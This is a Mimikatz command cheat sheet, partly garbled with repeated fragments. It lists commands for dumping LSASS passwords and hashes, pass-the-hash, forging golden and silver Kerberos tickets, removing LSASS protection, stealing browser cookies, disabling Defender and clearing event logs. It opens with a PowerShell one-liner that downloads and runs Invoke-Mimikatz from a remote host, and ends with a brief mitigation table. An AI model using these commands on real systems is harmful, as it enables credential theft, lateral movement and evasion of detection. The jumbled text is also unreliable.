Mimikatz — Commands
powershell -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://.../Invoke-Mimikatz.ps1'); Invoke-Mimikatz" (if LSASS is protected):
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit (PowerShell without touching disk): mimikatz commands
privilege::debug If successful, you can interact with LSASS. Interactive (from downloaded mimikatz.exe): powershell -exec bypass -c "IEX(New-Object Net
mimikatz.exe "!+" "!processprotect /process:lsass.exe /unprotect" | Command | Purpose | |---------|---------| | privilege::debug | Enable debug privilege (required for most actions) | | token::whoami | Show current token/user | | token::elevate | Try to elevate to SYSTEM | | exit | Quit Mimikatz | | version | Show version info | | cls | Clear screen | | log | Start logging to file (default: mimikatz.log) | Credential Extraction Dump all logon passwords (cleartext if WDigest enabled) sekurlsa::logonpasswords Dump only NTLM hashes sekurlsa::msv Dump Kerberos tickets sekurlsa::tickets Dump DPAPI master keys dpapi::masterkey /in:"C:\Users\user\AppData\Roaming\Microsoft\Protect\SID\..." Extract from LSASS dump file (offline) sekurlsa::minidump lsass.dmp sekurlsa::logonpasswords WDigest re-enable (Windows 8.1/2012R2+) privilege::debug sekurlsa::wdigest # Reboot required after registry change Pass-the-Hash / Over-Pass-the-Hash Pass-the-Hash (use NTLM hash directly) sekurlsa::pth /user:Administrator /domain:contoso.com /ntlm:hashhere /run:cmd.exe Over-Pass-the-Hash (generate Kerberos ticket from hash) sekurlsa::pth /user:Admin /domain:DOMAIN /ntlm:hash /run:cmd.exe Pass-the-Hash with RC4 or AES keys sekurlsa::pth /user:Admin /domain:DOMAIN /aes256:key /run:cmd.exe Kerberos Attacks (Pass-the-Ticket, Golden Ticket) List all Kerberos tickets in memory kerberos::list Pass-the-Ticket (inject ticket from file) kerberos::ptt ticket.kirbi Export all tickets to files sekurlsa::tickets /export Create a Golden Ticket (KRBTGT hash required) kerberos::golden /user:Administrator /domain:contoso.com /sid:S-1-5-21-... /krbtgt:hash /id:500 /ptt Create a Silver Ticket (service-specific) kerberos::golden /user:User /domain:contoso.com /sid:S-1-5-21-... /target:web.contoso.com /service:HTTP /rc4:hash /ptt Purge all Kerberos tickets kerberos::purge LSASS Protection Bypass Disable LSA Protection (RunAsPPL) !+ !processprotect /process:lsass.exe /unprotect Bypass Credential Guard (Windows 10+) Limited success; requires reboot to disable normally. Use minidump approach instead. Dump LSASS without touching LSASS (RPC method) lsadump::sam lsadump::secrets Miscellaneous Modules Dump SAM database (local users) lsadump::sam Dump LSA secrets (service passwords, autologon) lsadump::secrets Dump cached domain credentials (mscash) lsadump::cache Dump DPAPI backup keys lsadump::backupkeys /system:dc.contoso.com /export Patch Windows (e.g., disable Defender) misc::patch Extract Chrome/Edge cookies dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Cookies" /unprotect Clear system event log event::clear Create a process with stolen token token::elevate /domainadmin process::start cmd.exe Logging & Automation Start logging before attacks log log C:\temp\mimikatz_output.log Run scripted commands mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "lsadump::sam" "exit" >> output.txt PowerShell scripted extraction Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords" "exit"' Defense & Detection | Attack | Mitigation | |--------|-------------| | Credential dumping | Enable LSA Protection (RunAsPPL), Credential Guard | | WDigest cleartext | Disable WDigest (reg: UseLogonCredential = 0) | | Pass-the-Hash | Require Kerberos, restrict admin logins, use Protected Users group | | Golden Ticket | Regularly rotate KRBTGT password (twice), use domain controllers as RODC | | Pass-the-Ticket | Enable Kerberos Armoring (FAST), use Protected Users | | LSASS access | Block SeDebugPrivilege for non-admins, enable Defender ASR rules | /target:web
mimikatz.exe (command line):
